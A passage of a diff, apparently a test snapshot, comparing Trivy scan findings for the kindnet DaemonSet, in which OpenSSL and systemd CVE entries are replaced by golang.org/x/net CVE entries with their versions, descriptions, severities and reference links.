"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0946", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-4304.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", + "value": "https://pkg.go.dev/vuln/GO-2021-0356", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5844-1", + "value": "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4304", + "value": "https://security.netapp.com/advisory/ntap-20220429-0002/", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230207.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-27191", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0465", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", + "fixedVersion": "0.0.0-20210520170846-37e1c6afe023", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-33194", + "installedVersion": "v0.0.0-20201110031124-69a78807bb2b", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-0465", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", - "https://security.netapp.com/advisory/ntap-20230414-0001/", - "https://ubuntu.com/security/notices/USN-6039-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0465", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230328.txt", + "https://access.redhat.com/security/cve/CVE-2021-33194", + "https://github.com/advisories/GHSA-83g2-8m93-v3w7", + "https://github.com/golang/net/commit/37e1c6afe02340126705deced573a85ab75209d7", + "https://go.dev/cl/311090", + "https://go.dev/issue/46288", + "https://go.googlesource.com/net/+/37e1c6afe02340126705deced573a85ab75209d7", + "https://groups.google.com/g/golang-announce/c/wPunbCPkWUg", + "https://groups.google.com/g/golang-dev/c/28x0nthP-c8/m/KqWVTjsnBAAJ", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4CHKSFMHZVOBCZSSVRE3UEYNKARTBMTM/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-33194", + "https://pkg.go.dev/vuln/GO-2021-0238", + "https://www.cve.org/CVERecord?id=CVE-2021-33194", ], }, "category": "Vulnerability", - "description": "Applications that use a non-default option when verifying certificates may be -vulnerable to an attack from a malicious CA to circumvent certain checks. - -Invalid certificate policies in leaf certificates are silently ignored by -OpenSSL and other certificate policy checks are skipped for that certificate. -A malicious CA could use this to deliberately assert invalid certificate policies -in order to circumvent policy checking on the certificate altogether. - -Policy processing is disabled by default but can be enabled by passing -the \`-policy' argument to the command line utilities or by calling the -\`X509_VERIFY_PARAM_set1_policies()' function.", + "description": "golang.org/x/net before v0.0.0-20210520170846-37e1c6afe023 allows attackers to cause a denial of service (infinite loop) via crafted ParseFragment input.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "Invalid certificate policies in leaf certificates are silently ignored", + "name": "golang: x/net/html: infinite loop in ParseFragment", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0465", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0465", + "value": "https://avd.aquasec.com/nvd/cve-2021-33194", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", + "value": "https://access.redhat.com/security/cve/CVE-2021-33194", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", + "value": "https://github.com/advisories/GHSA-83g2-8m93-v3w7", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", + "value": "https://github.com/golang/net/commit/37e1c6afe02340126705deced573a85ab75209d7", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", + "value": "https://go.dev/cl/311090", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", + "value": "https://go.dev/issue/46288", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://go.googlesource.com/net/+/37e1c6afe02340126705deced573a85ab75209d7", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", + "value": "https://groups.google.com/g/golang-announce/c/wPunbCPkWUg", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", + "value": "https://groups.google.com/g/golang-dev/c/28x0nthP-c8/m/KqWVTjsnBAAJ", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6039-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4CHKSFMHZVOBCZSSVRE3UEYNKARTBMTM/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0465", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33194", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://pkg.go.dev/vuln/GO-2021-0238", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230328.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-33194", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0466", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", + "fixedVersion": "0.0.0-20211209124913-491a49abca63", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-44716", + "installedVersion": "v0.0.0-20201110031124-69a78807bb2b", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-0466", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", - "https://security.netapp.com/advisory/ntap-20230414-0001/", - "https://ubuntu.com/security/notices/USN-6039-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0466", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230328.txt", + "https://access.redhat.com/security/cve/CVE-2021-44716", + "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", + "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", + "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", + "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", + "https://go.dev/cl/369794", + "https://go.dev/issue/50058", + "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", + "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", + "https://linux.oracle.com/cve/CVE-2021-44716.html", + "https://linux.oracle.com/errata/ELSA-2022-0001.html", + "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", + "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", + "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", + "https://pkg.go.dev/vuln/GO-2022-0288", + "https://security.gentoo.org/glsa/202208-02", + "https://security.netapp.com/advisory/ntap-20220121-0002/", + "https://www.cve.org/CVERecord?id=CVE-2021-44716", ], }, "category": "Vulnerability", - "description": "The function X509_VERIFY_PARAM_add0_policy() is documented to -implicitly enable the certificate policy check when doing certificate -verification. However the implementation of the function does not -enable the check which allows certificates with invalid or incorrect -policies to pass the certificate verification. - -As suddenly enabling the policy check could break existing deployments it was -decided to keep the existing behavior of the X509_VERIFY_PARAM_add0_policy() -function. - -Instead the applications that require OpenSSL to perform certificate -policy check need to use X509_VERIFY_PARAM_set1_policies() or explicitly -enable the policy check by calling X509_VERIFY_PARAM_set_flags() with -the X509_V_FLAG_POLICY_CHECK flag argument. - -Certificate policy checks are disabled by default in OpenSSL and are not -commonly used by applications.", + "description": "net/http in Go before 1.16.12 and 1.17.x before 1.17.5 allows uncontrolled memory consumption in the header canonicalization cache via HTTP/2 requests.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "Certificate policy check not enabled", + "name": "golang: net/http: limit growth of header canonicalization cache", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0466", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0466", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", + "value": "https://avd.aquasec.com/nvd/cve-2021-44716", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", + "value": "https://access.redhat.com/security/cve/CVE-2021-44716", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", + "value": "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6039-1", + "value": "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0466", + "value": "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://go.dev/cl/369794", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230328.txt", + "value": "https://go.dev/issue/50058", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2007-6755", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", - "references": [ - "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", - "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", - "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", - "http://rump2007.cr.yp.to/15-shumow.pdf", - "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", - "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", - "http://www.securityfocus.com/bid/63657", - "https://access.redhat.com/security/cve/CVE-2007-6755", - "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", - "https://www.cve.org/CVERecord?id=CVE-2007-6755", - "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", - ], - }, - "category": "Vulnerability", - "description": "The NIST SP 800-90A default statement of the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm contains point Q constants with a possible relationship to certain "skeleton key" values, which might allow context-dependent attackers to defeat cryptographic protection mechanisms by leveraging knowledge of those values. NOTE: this is a preliminary CVE for Dual_EC_DRBG; future research may provide additional details about point Q and associated attacks, and could potentially lead to a RECAST or REJECT of this CVE.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "Dual_EC_DRBG: weak pseudo random number generator", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2007-6755", + "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", }, { "type": "URL", - "value": "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", + "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", }, { "type": "URL", - "value": "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", + "value": "https://linux.oracle.com/cve/CVE-2021-44716.html", }, { "type": "URL", - "value": "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", + "value": "https://linux.oracle.com/errata/ELSA-2022-0001.html", }, { "type": "URL", - "value": "http://rump2007.cr.yp.to/15-shumow.pdf", + "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", }, { "type": "URL", - "value": "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", + "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", }, { "type": "URL", - "value": "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", + "value": "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/63657", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2007-6755", + "value": "https://pkg.go.dev/vuln/GO-2022-0288", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", + "value": "https://security.gentoo.org/glsa/202208-02", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2007-6755", + "value": "https://security.netapp.com/advisory/ntap-20220121-0002/", }, { "type": "URL", - "value": "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-44716", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2010-0928", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", + "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-27664", + "installedVersion": "v0.0.0-20201110031124-69a78807bb2b", + "packageName": "golang.org/x/net", "references": [ - "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", - "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", - "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", - "http://www.osvdb.org/62808", - "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", - "https://access.redhat.com/security/cve/CVE-2010-0928", - "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", - "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", - "https://www.cve.org/CVERecord?id=CVE-2010-0928", + "https://access.redhat.com/errata/RHSA-2023:2357", + "https://access.redhat.com/security/cve/CVE-2022-27664", + "https://bugzilla.redhat.com/2107371", + "https://bugzilla.redhat.com/2107374", + "https://bugzilla.redhat.com/2107383", + "https://bugzilla.redhat.com/2107386", + "https://bugzilla.redhat.com/2107388", + "https://bugzilla.redhat.com/2113814", + "https://bugzilla.redhat.com/2124669", + "https://bugzilla.redhat.com/2132868", + "https://bugzilla.redhat.com/2132872", + "https://bugzilla.redhat.com/2161274", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "https://errata.rockylinux.org/RLSA-2022:7129", + "https://github.com/advisories/GHSA-69cg-p879-7622", + "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "https://github.com/golang/go/issues/54658", + "https://go.dev/cl/428735", + "https://go.dev/issue/54658", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-27664.html", + "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "https://pkg.go.dev/vuln/GO-2022-0969", + "https://security.gentoo.org/glsa/202209-26", + "https://security.netapp.com/advisory/ntap-20220923-0004/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-27664", ], }, "category": "Vulnerability", - "description": "OpenSSL 0.9.8i on the Gaisler Research LEON3 SoC on the Xilinx Virtex-II Pro FPGA uses a Fixed Width Exponentiation (FWE) algorithm for certain signature calculations, and does not verify the signature before providing it to a caller, which makes it easier for physically proximate attackers to determine the private key via a modified supply voltage for the microprocessor, related to a "fault-based attack."", + "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "openssl: RSA authentication weakness", + "name": "handle server errors after sending GOAWAY", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2010-0928", - }, - { - "type": "URL", - "value": "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", + "value": "https://avd.aquasec.com/nvd/cve-2022-27664", }, { "type": "URL", - "value": "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", + "value": "https://access.redhat.com/errata/RHSA-2023:2357", }, { "type": "URL", - "value": "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-27664", }, { "type": "URL", - "value": "http://www.osvdb.org/62808", + "value": "https://bugzilla.redhat.com/2107371", }, { "type": "URL", - "value": "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", + "value": "https://bugzilla.redhat.com/2107374", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2010-0928", + "value": "https://bugzilla.redhat.com/2107383", }, { "type": "URL", - "value": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", + "value": "https://bugzilla.redhat.com/2107386", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", + "value": "https://bugzilla.redhat.com/2107388", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2010-0928", + "value": "https://bugzilla.redhat.com/2113814", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "247.3-7+deb11u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-3821", - "installedVersion": "247.3-7", - "packageName": "libsystemd0", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:0336", - "https://access.redhat.com/security/cve/CVE-2022-3821", - "https://bugzilla.redhat.com/2139327", - "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", - "https://errata.almalinux.org/9/ALSA-2023-0336.html", - "https://errata.rockylinux.org/RLSA-2023:0336", - "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", - "https://github.com/systemd/systemd/issues/23928", - "https://github.com/systemd/systemd/pull/23933", - "https://linux.oracle.com/cve/CVE-2022-3821.html", - "https://linux.oracle.com/errata/ELSA-2023-0336.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", - "https://security.gentoo.org/glsa/202305-15", - "https://ubuntu.com/security/notices/USN-5928-1", - "https://www.cve.org/CVERecord?id=CVE-2022-3821", - ], - }, - "category": "Vulnerability", - "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "buffer overrun in format_timespan() function", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-3821", + "value": "https://bugzilla.redhat.com/2124669", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0336", + "value": "https://bugzilla.redhat.com/2132868", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-3821", + "value": "https://bugzilla.redhat.com/2132872", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2139327", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0336", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/issues/23928", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/pull/23933", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202305-15", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5928-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "247.3-7+deb11u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4415", - "installedVersion": "247.3-7", - "packageName": "libsystemd0", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:0954", - "https://access.redhat.com/security/cve/CVE-2022-4415", - "https://bugzilla.redhat.com/2149063", - "https://bugzilla.redhat.com/2155515", - "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", - "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", - "https://errata.almalinux.org/9/ALSA-2023-0954.html", - "https://errata.rockylinux.org/RLSA-2023:0954", - 